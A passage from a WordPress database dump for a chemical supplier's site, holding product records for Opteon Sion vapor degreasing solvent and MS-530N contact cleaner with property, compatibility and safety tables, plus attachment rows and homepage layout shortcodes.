center;">87</td>\r\n<td>121</td>\r\n<td style="text-align: center;">71</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">°F</td>\r\n<td style="text-align: center;">117</td>\r\n<td style="text-align: center;">118</td>\r\n<td style="text-align: center;">90</td>\r\n<td style="text-align: center;">109</td>\r\n<td style="text-align: center;">129</td>\r\n<td style="text-align: center;">188</td>\r\n<td style="text-align: center;">250</td>\r\n<td style="text-align: center;">160</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density(1)</td>\r\n<td style="text-align: center;">g/cm^3</td>\r\n<td style="text-align: center;">1.29</td>\r\n<td style="text-align: center;">1.56</td>\r\n<td style="text-align: center;">1.23</td>\r\n<td style="text-align: center;">1.28</td>\r\n<td style="text-align: center;">1.55</td>\r\n<td style="text-align: center;">1.46</td>\r\n<td style="text-align: center;">1.62</td>\r\n<td style="text-align: center;">1.35</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">lb/gal</td>\r\n<td style="text-align: center;">10.7</td>\r\n<td style="text-align: center;">13</td>\r\n<td style="text-align: center;">10.3</td>\r\n<td style="text-align: center;">10.7</td>\r\n<td style="text-align: center;">12.9</td>\r\n<td style="text-align: center;">12.1</td>\r\n<td style="text-align: center;">13.5</td>\r\n<td style="text-align: center;">11.3</td>\r\n</tr>\r\n<tr>\r\n<td>Saturated Vapor Density(1)</td>\r\n<td style="text-align: center;">kg/m^3</td>\r\n<td style="text-align: center;">1.81</td>\r\n<td style="text-align: center;">3.47</td>\r\n<td style="text-align: center;">3.83</td>\r\n<td style="text-align: center;">N.D.(2)</td>\r\n<td style="text-align: center;">N.D.(2)</td>\r\n<td style="text-align: center;">4.5</td>\r\n<td style="text-align: center;">5.7</td>\r\n<td style="text-align: center;">4.24</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">lb/ft^3</td>\r\n<td style="text-align: center;">0.11</td>\r\n<td style="text-align: center;">0.21</td>\r\n<td style="text-align: center;">0.23</td>\r\n<td style="text-align: center;">N.D.(2)</td>\r\n<td style="text-align: center;">N.D.(2)</td>\r\n<td style="text-align: center;">0.27</td>\r\n<td style="text-align: center;">0.35</td>\r\n<td style="text-align: center;">0.26</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension(1)</td>\r\n<td style="text-align: center;">Dyn/cm</td>\r\n<td style="text-align: center;">21</td>\r\n<td style="text-align: center;">17.3</td>\r\n<td style="text-align: center;">19.3</td>\r\n<td style="text-align: center;">19</td>\r\n<td style="text-align: center;">16.2</td>\r\n<td style="text-align: center;">29.5</td>\r\n<td style="text-align: center;">29.5</td>\r\n<td style="text-align: center;">25.9</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure(1)</td>\r\n<td style="text-align: center;">kPa</td>\r\n<td style="text-align: center;">44.7</td>\r\n<td style="text-align: center;">44.1</td>\r\n<td style="text-align: center;">79.5</td>\r\n<td style="text-align: center;">46.7</td>\r\n<td style="text-align: center;">38.7</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">2.4</td>\r\n<td style="text-align: center;">20</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">psia</td>\r\n<td style="text-align: center;">6.5</td>\r\n<td style="text-align: center;">6.4</td>\r\n<td style="text-align: center;">11.5</td>\r\n<td style="text-align: center;">6.8</td>\r\n<td style="text-align: center;">5.6</td>\r\n<td style="text-align: center;">1.2</td>\r\n<td style="text-align: center;">0.35</td>\r\n<td style="text-align: center;">2.9</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity(1)</td>\r\n<td style="text-align: center;">cP</td>\r\n<td style="text-align: center;">0.42</td>\r\n<td style="text-align: center;">0.68</td>\r\n<td style="text-align: center;">0.43</td>\r\n<td style="text-align: center;">0.45</td>\r\n<td style="text-align: center;">0.59</td>\r\n<td>0.49</td>\r\n<td style="text-align: center;">0.75</td>\r\n<td style="text-align: center;">0.49</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Thermal Conductivity(1)</td>\r\n<td style="text-align: center;">mW/m-K</td>\r\n<td style="text-align: center;">128</td>\r\n<td style="text-align: center;">72.3</td>\r\n<td style="text-align: center;">90.6</td>\r\n<td style="text-align: center;">N.D.(2)</td>\r\n<td style="text-align: center;">N.D.(2)</td>\r\n<td style="text-align: center;">115.9</td>\r\n<td style="text-align: center;">N.D.(2)</td>\r\n<td style="text-align: center;">N.D.(2)</td>\r\n</tr>\r\n<tr>\r\n<td>Heat Capacity(1)</td>\r\n<td style="text-align: center;">kJ/kg °C</td>\r\n<td style="text-align: center;">1.069</td>\r\n<td style="text-align: center;">1.079</td>\r\n<td style="text-align: center;">1.0996</td>\r\n<td style="text-align: center;">N.D.(2)</td>\r\n<td style="text-align: center;">1.046</td>\r\n<td style="text-align: center;">0.962</td>\r\n<td style="text-align: center;">0.855</td>\r\n<td style="text-align: center;">1.103</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Btu/lb °F</td>\r\n<td style="text-align: center;">0.26</td>\r\n<td style="text-align: center;">0.26</td>\r\n<td style="text-align: center;">0.27</td>\r\n<td style="text-align: center;">N.D.(2)</td>\r\n<td style="text-align: center;">0.25</td>\r\n<td style="text-align: center;">0.23</td>\r\n<td style="text-align: center;">0.21</td>\r\n<td style="text-align: center;">0.27</td>\r\n</tr>\r\n<tr>\r\n<td>Heat of Vaporization at Boiling Point</td>\r\n<td style="text-align: center;">kJ/kg</td>\r\n<td style="text-align: center;">280</td>\r\n<td style="text-align: center;">147</td>\r\n<td style="text-align: center;">223</td>\r\n<td style="text-align: center;">218</td>\r\n<td style="text-align: center;">145</td>\r\n<td style="text-align: center;">236</td>\r\n<td style="text-align: center;">210</td>\r\n<td style="text-align: center;">246</td>\r\n</tr>\r\n<tr>\r\n<td>KB Value</td>\r\n<td></td>\r\n<td style="text-align: center;">103</td>\r\n<td style="text-align: center;">31</td>\r\n<td style="text-align: center;">56</td>\r\n<td style="text-align: center;">52</td>\r\n<td style="text-align: center;">31</td>\r\n<td style="text-align: center;">129</td>\r\n<td style="text-align: center;">90</td>\r\n<td style="text-align: center;">125</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nAll data compiled was furnished from publicly available sources. (1) Values reported are at 25 °C (77 °F), unless otherwise specified. (2) N.D. refers to no reference data available.\r\n<h4><strong>Performance Evaluations</strong></h4>\r\nOpteon™ Sion was evaluated for performance using typical coupon cleaning tests according to ASTM G122. Below are examples of the results from performance evaluations. Contact Chemours to initiate a cleaning trial in one of our regional cleaning laboratories or obtain a sample for on-site testing.\r\n\r\nTable 2. Performance Evaluations of Opteon™ Sion\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250"></td>\r\n<td style="text-align: center;" width="206">Contamination Level\r\n(mg/cm^2)</td>\r\n<td style="text-align: center;" width="206">% Contamination Removed\r\n(avg. of 3 trials)</td>\r\n</tr>\r\n<tr>\r\n<td>Mineral Oil</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">100%</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Hydraulic Fluid\r\n(MIL-PRF-83282)</td>\r\n<td style="text-align: center;">3.29</td>\r\n<td style="text-align: center;">100%</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Grease\r\n(MIL-PRF-81322)</td>\r\n<td style="text-align: center;">16.27</td>\r\n<td style="text-align: center;">100%</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nOpteon™ Sion was evaluated for cleaning fluxes/residues and found effective in cleaning non-polar flux rosin residues from surface mounted technology printed circuit boards.\r\n<h4><strong>Solubility</strong></h4>\r\nOpteon™ Sion has the highest cleaning power of any cleaning fluid in its class as measured by the KB value (KB value = 103). The KB value is determined by ASTM D1133 and is a well known measurement of solvency strength. In general, the higher the KB value, the greater the cleaning power. The solubility of Opteon™ Sion for various contaminants is shown in Table 3.\r\n\r\nTable 3. Solubility of Various Contaminants in Opteon™ Sion\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Contaminant</td>\r\n<td style="text-align: center;" width="206">Solubility</td>\r\n</tr>\r\n<tr>\r\n<td>Mineral</td>\r\n<td style="text-align: center;">Miscible</td>\r\n</tr>\r\n<tr>\r\n<td>Hydraulic Fluid (MIL-PRF-83282)</td>\r\n<td style="text-align: center;">Miscible</td>\r\n</tr>\r\n<tr>\r\n<td>Grease (MIL-PRF-81322)</td>\r\n<td style="text-align: center;">Miscible</td>\r\n</tr>\r\n<tr>\r\n<td>Silicone (DC-704)</td>\r\n<td style="text-align: center;">Miscible</td>\r\n</tr>\r\n<tr>\r\n<td>Skydrol®*</td>\r\n<td style="text-align: center;">Miscible</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*Registered trademark of Eastman Chemical Company\r\n<h4><strong>Materials Compatibility</strong></h4>\r\nOpteon™ Sion is characterized by good compatibility with a wide selection of metals; for example, stainless steel, copper, brass, and aluminum. Opteon™ Sion is compatible with these plastics and elastomers: Teflon™ (PTFE), FEP, PFA, polyethylene, polypropylene, Nylon, Kynar, Ryton, Halar, and Kalrez®. Examples of incompatible plastics include PMMA, ABS, polycarbonate, and polystyrene. Most elastomers, including Viton™, Natural rubber, EPDM, silicone, and Hypalon®, show reversible swelling when exposed to Opteon™ Sion. Teflon™ or Teflon™ encapsulated gaskets and O-ring seals are recommended for diaphragm pumps. Individual plastic and elastomeric formulations can vary with the manufacturer; therefore, the best assurance of material compatibility can be recommended after testing under conditions expected during normal operation. Contact your local technical representative for specific material compatibility concerns.\r\n\r\nTable 4. Plastics/Elastomers Compatibility\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456">Plastics</td>\r\n<td style="text-align: center;" colspan="2" width="412">Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Compatible</td>\r\n<td style="text-align: center;">Incompatible</td>\r\n<td style="text-align: center;">Compatible</td>\r\n<td style="text-align: center;">Incompatible</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Polyethylene</td>\r\n<td style="text-align: center;">Polystyrene</td>\r\n<td style="text-align: center;">Teflon™</td>\r\n<td style="text-align: center;">Silicone</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Polypropylene</td>\r\n<td style="text-align: center;">Polycarbonate</td>\r\n<td style="text-align: center;">Kalrez®</td>\r\n<td style="text-align: center;">Hypalon®</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Teflon™</td>\r\n<td style="text-align: center;">ABS</td>\r\n<td style="text-align: center;">Ryton</td>\r\n<td style="text-align: center;">EPDM Rubber</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Polyester</td>\r\n<td style="text-align: center;">Polyacrylate</td>\r\n<td style="text-align: center;">PTFE w/EPDM</td>\r\n<td style="text-align: center;">Viton™</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Nylon</td>\r\n<td style="text-align: center;">Acrylic (PMMA)</td>\r\n<td style="text-align: center;">PTFE w/Neoprene</td>\r\n<td style="text-align: center;">Buna N</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">FEP/PFA</td>\r\n<td style="text-align: center;">Polysulfone</td>\r\n<td style="text-align: center;">Parafluor</td>\r\n<td style="text-align: center;">Fluorosilicone</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Halar</td>\r\n<td style="text-align: center;"></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Kynar</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Safety, Toxicity, and Environmental</strong></h4>\r\nOpteon™ Sion exhibits no closed or open cup flash point and is classified as a nonflammable liquid by NFPA or DOT. The product is volatile; vapor may become flammable when mixed with air in the concentrations shown below. Flash point data and vapor flammability limits in air are shown in Table 5.\r\n\r\nTable 5. Safety, Toxicity, and Environmental Properties\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250">Property</td>\r\n<td style="text-align: center;" width="206">Units</td>\r\n<td style="text-align: center;" width="206">Opteon™ Sion</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point, CC, ASTM D56</td>\r\n<td style="text-align: center;">°C (°F)</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point, OC, ASTM D1310</td>\r\n<td style="text-align: center;">°C (°F)</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Flammability Limits</td>\r\n<td style="text-align: center;">% Vol</td>\r\n<td style="text-align: center;">7.25–15.25</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion Potential</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>Global Warming Potential</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">&lt;15</td>\r\n</tr>\r\n<tr>\r\n<td>Volatile Organic Compounds (VOC)</td>\r\n<td style="text-align: center;">g/L</td>\r\n<td style="text-align: center;">1278</td>\r\n</tr>\r\n<tr>\r\n<td>Occupational Exposure Limit</td>\r\n<td style="text-align: center;">ppm</td>\r\n<td style="text-align: center;">201</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Storage and Handling</strong>\r\n\r\nOpteon™ Sion is thermally stable and does not oxidize or degrade during storage. It is recommended to store containers in a clean and dry area, and protect them from freezing and excessive temperatures of 52 °C (126 °F). When stored properly, an unopened package has no shelf life. Package sizes for Opteon™ Sion are 20 kg (metal pail) and 227 kg (steel drum). Laminate film gloves are recommended when handling Opteon™ Sion.\r\n<h4><strong>Benefits &amp; Features</strong></h4>\r\nOpteon™ Sion specialty fluid features an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. As a result, it’s an ideal candidate for replacing solvents like n-propyl bromide (nPB), perchloroethylene (Perc), water (H2O), and trichloroethylene (TCE) in industrial cleaning applications.\r\n\r\nProduct performance benefits driven by designed solvent properties:\r\n<ul>\r\n 	<li>The high solvency power (KB value = 103) of Opteon™ Sion supports superior cleaning performance within its class.</li>\r\n 	<li>The high relative evaporation rate of Opteon™ Sion delivers fast drying cycles and immediate use of cleaned parts for further processing.</li>\r\n 	<li>The optimal boiling point of Opteon™ Sion translates to greater work throughput and significant reduction in cleaning equipment energy consumption.</li>\r\n 	<li>Opteon™ Sion supports lower cost of ownership, because of its low boiling point and ability to recycle the used solvent, which eliminates the equipment downtime associated with solvent change-outs. The low liquid density of Opteon™ Sion also guarantees more solvent volume for the same fill weight.</li>\r\n 	<li>Freezing point supports use in cold cleaning applications at extremely low temperatures.</li>\r\n 	<li>Unmatched high wetting index coupled with superior molecular volume provides excellent performance in a variety of cleaning applications.</li>\r\n 	<li>High exposure limits allow flexibility with cleaning process, low cost equipment selection, and worker safety.</li>\r\n 	<li>Opteon™ Sion is considered safe, as it is nonflammable and, therefore, not classified as an HAP.</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/opteon-sion-specialty-solvent/">A retrofit guideline can be found here.</a>', 'Sion', 'Opteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties.', 'publish', 'open', 'closed', '', 'opteon-sion', '', '', '2016-10-28 20:04:40', '2016-10-28 20:04:40', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1287', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1288, 2, '2016-09-07 15:22:57', '2016-09-07 15:22:57', '', 'Opteon Sion', '', 'inherit', 'open', 'closed', '', 'opteon-sion', '', '', '2016-09-07 15:22:57', '2016-09-07 15:22:57', '', 1287, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Opteon-Sion.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1289, 2, '2016-09-07 15:34:44', '2016-09-07 15:34:44', '', 'Opteon Sion', '', 'inherit', 'open', 'closed', '', 'opteon-sion-2', '', '', '2016-10-13 14:14:38', '2016-10-13 14:14:38', '', 1287, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/opteon-sion.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1290, 2, '2016-09-07 15:41:10', '2016-09-07 15:41:10', '', 'opteon', '', 'inherit', 'open', 'closed', '', 'opteon', '', '', '2016-09-07 15:41:10', '2016-09-07 15:41:10', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/opteon.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1291, 3, '2016-09-07 15:50:00', '2016-09-07 15:50:00', '', 'FluoroExtreme Dental Handpiece Lubricants', '', 'inherit', 'open', 'closed', '', 'dental-2', '', '', '2016-11-24 03:00:09', '2016-11-24 03:00:09', '', 474, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/DENTAL.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1292, 2, '2016-09-07 16:37:19', '2016-09-07 16:37:19', 'MS-530N Contact Re-Nu is a cleaning agent that restores electrical or mechanical continuity on all types of contacts. Excellent for cleaning oxides, oil, grease and dust from  contacts, switches, relays, tuners, encoders, slide wires, rheostats, distribution panels and servomechanisms. Evaporates quickly and leaves no residue. Utilizes Miller-Stephenson\'s proprietary cleaning technology non-flammable, low odor solvent blend.\r\n<h4><strong>ADVANTAGES:</strong></h4>\r\n<ul>\r\n 	<li>High effective cleaning agent</li>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>100% Nonflammable; low odor</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>RoHS compliant</li>\r\n</ul>\r\nMS-530N Contact Re-Nu is an electrical contact cleaner that has a high cleaning efficiency Kb value, while maintaining complete compatibility with most plastics, metals and elastomers, and sensitive electronic components.\r\n<h3><strong> </strong><strong>PLASTIC COMPATIBILITY:</strong></h3>\r\n(Immersion: 15 minutes at Room Temperature)\r\n<table style="height: 104px;" width="532">\r\n<tbody>\r\n<tr>\r\n<td width="168">·         Acetal</td>\r\n<td width="168">·         Polyethylene</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         Polypropylene</td>\r\n<td width="168">·         Polyester, PBT, PET</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         PEK, PEEK</td>\r\n<td width="168">·         Epoxy-Phenolcs</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         Polyimides</td>\r\n<td width="168">·         Polyvinylchloride</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         PTFE</td>\r\n<td width="168">·         Liq. Crystal Polymer</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong> </strong><strong>NOTE:</strong><strong>  </strong>Acrylics, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\r\n<h3><strong>Elastomer Capability: </strong></h3>\r\n(Immersion: 15 mins at Room Temperature)\r\n<table style="height: 173px;" width="511">\r\n<tbody>\r\n<tr>\r\n<td width="168">·   Butyl Rubber</td>\r\n<td width="168">·    Natural Rubber</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Polysulfide</td>\r\n<td width="168">·    EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Buna S</td>\r\n<td width="168">·    Buna N</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Neoprene</td>\r\n<td width="168">·    Urethane</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Chlorosulfonated PE</td>\r\n<td width="168">·    Silicone</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Viton™</td>\r\n<td width="168"> Fluorosilicones</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong> </strong><strong>NOTE:</strong> Elastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.\r\n<h3><strong>Metal Compatibility:</strong></h3>\r\n(Immersion: 2 weeks at 99°F/37°C)\r\n<ul>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper</li>\r\n 	<li>Iron</li>\r\n 	<li>Gold</li>\r\n</ul>\r\n<strong> </strong><strong>Note:</strong><strong>  </strong>Test for compatibility before use.\r\n<h3>Technical Service:</h3>\r\n<a href="https://www.miller-stephenson.com/tech-support/">For any technical service issues please contact our experienced staff here</a>', 'MS-530N Contact Re-Nu®', 'An economical cleaning agent that restores electrical or mechanical continuity on all types of contacts. Removes oxides, oil, grease and dust from electrical contacts, relays, encoders, slide wires, rheostats, distribution panels and switching devices. Evaporates quickly and leaves no residue. No ODC (ozone depleting chemicals). Utilizes Miller-Stephenson\'s proprietary cleaning technology and 100% non-flammable, low odor solvent blend.', 'publish', 'open', 'closed', '', 'ms-530n-contact-re-nu', '', '', '2016-11-29 14:43:43', '2016-11-29 14:43:43', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1292', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1293, 3, '2016-09-07 15:57:12', '2016-09-07 15:57:12', '', 'Vazo 88 radical initiator', '', 'inherit', 'open', 'closed', '', 'vazo-88-2', '', '', '2016-11-24 03:55:18', '2016-11-24 03:55:18', '', 577, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-88.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1294, 2, '2016-09-07 15:57:26', '2016-09-07 15:57:26', '', 'Contact Re-Nu', '', 'inherit', 'open', 'closed', '', 'contact-re-nu', '', '', '2016-09-07 15:57:26', '2016-09-07 15:57:26', '', 1292, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Contact-Re-Nu.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1312, 2, '2016-09-07 18:12:50', '2016-09-07 18:12:50', '', '9937', '', 'inherit', 'open', 'closed', '', '9937', '', '', '2016-09-07 18:12:50', '2016-09-07 18:12:50', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9937.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1313, 2, '2016-09-07 18:13:25', '2016-09-07 18:13:25', '', '9939', '', 'inherit', 'open', 'closed', '', '9939', '', '', '2016-09-07 18:13:25', '2016-09-07 18:13:25', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9939.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1314, 2, '2016-09-07 18:13:47', '2016-09-07 18:13:47', '', '9941', '', 'inherit', 'open', 'closed', '', '9941', '', '', '2016-09-07 18:13:47', '2016-09-07 18:13:47', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9941.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1315, 2, '2016-09-07 18:14:40', '2016-09-07 18:14:40', '', '9959', '', 'inherit', 'open', 'closed', '', '9959', '', '', '2016-09-07 18:14:40', '2016-09-07 18:14:40', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9959.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1316, 2, '2016-09-07 18:15:18', '2016-09-07 18:15:18', '', '9961', '', 'inherit', 'open', 'closed', '', '9961', '', '', '2016-09-07 18:15:18', '2016-09-07 18:15:18', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9961.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1317, 2, '2016-09-07 18:15:37', '2016-09-07 18:15:37', '', '9963', '', 'inherit', 'open', 'closed', '', '9963', '', '', '2016-09-07 18:15:37', '2016-09-07 18:15:37', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9963.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1318, 2, '2016-09-07 18:16:00', '2016-09-07 18:16:00', '', '9965', '', 'inherit', 'open', 'closed', '', '9965', '', '', '2016-09-07 18:16:00', '2016-09-07 18:16:00', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/9965.tif', 0, 'attachment', 'image/tiff', 0); 
INSERT INTO `wp_posts` VALUES (1319, 1, '2016-09-07 18:16:17', '2016-09-07 18:16:17', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="/epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image 